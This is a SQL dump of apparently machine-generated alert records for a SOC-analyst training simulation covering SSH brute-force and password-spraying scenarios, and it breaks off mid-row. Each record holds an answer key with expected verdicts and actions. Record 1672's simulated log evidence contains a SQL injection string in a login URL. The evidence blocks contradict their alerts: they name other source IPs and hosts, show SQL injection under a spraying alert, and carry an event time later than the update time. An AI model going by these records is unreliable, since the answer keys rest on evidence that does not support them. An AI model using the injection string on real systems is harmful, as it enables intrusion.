(1670, 'Multiple Failed SSH Logins from Suspicious IP', 'medium', 'Elastic SIEM', 'A suspicious IP address was observed making multiple failed SSH login attempts, resembling a brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:40:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.120\",\"dst_ip\":\"10.0.0.30\",\"username\":\"admin\",\"hostname\":\"server1\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.120\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for SSH brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s history of malicious activity confirms the attack as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1671, 'Suspicious Login Attempts Detected on Internal Network', 'medium', 'Wazuh', 'Detected multiple login failures from an external IP targeting internal resources, indicating a potential password spraying attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T17:15:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.66\",\"dst_ip\":\"192.168.1.35\",\"username\":\"employee\",\"hostname\":\"internal-portal\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.66\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for frequent login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"employee\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP\'s OSINT result confirms it as a malicious source, justifying the alert.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1672, 'Password Spraying Attack Against Internal Web Portal', 'high', 'Azure Sentinel', 'Detected a high number of failed login attempts from a single IP address across multiple user accounts.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:30:20Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.130\",\"dst_ip\":\"10.0.0.40\",\"username\":\"user4\",\"hostname\":\"internal-web\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.130\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP engaged in password spraying\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user4\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The malicious activity and OSINT results confirm the password spraying attack.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1673, 'SSH Brute Force Detected from Domestic IP', 'medium', 'Splunk', 'A domestic IP address was flagged for making multiple failed SSH login attempts to a server, indicating a possible brute force.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T19:05:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"10.0.0.50\",\"username\":\"root\",\"hostname\":\"domestic-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP flagged for unusual activity, but not malicious\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP activity was suspicious but not confirmed malicious, leading to the conclusion of a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.945Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T19:05:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"domestic-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1674, 'Unusual Brute Force Activity from Known Good IP', 'low', 'Elastic SIEM', 'Failed login attempts detected from an IP address previously identified as benign, suggesting potential misconfiguration.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T20:30:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.140\",\"dst_ip\":\"10.0.0.60\",\"username\":\"admin\",\"hostname\":\"test-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.140\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with any known malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.60\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s clean OSINT result and previous benign reputation indicate a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.946Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.140\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"test-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1675, 'Unsuccessful Password Spraying Attempt', 'medium', 'Wazuh', 'An IP address was observed making multiple unsuccessful login attempts across several accounts, potentially indicating a password spraying attempt.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T21:40:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.77\",\"dst_ip\":\"192.168.1.75\",\"username\":\"test\",\"hostname\":\"web-auth\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP flagged due to abnormal activities but not confirmed malicious\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"test\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The suspicious activity was not confirmed as malicious, classifying the event as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 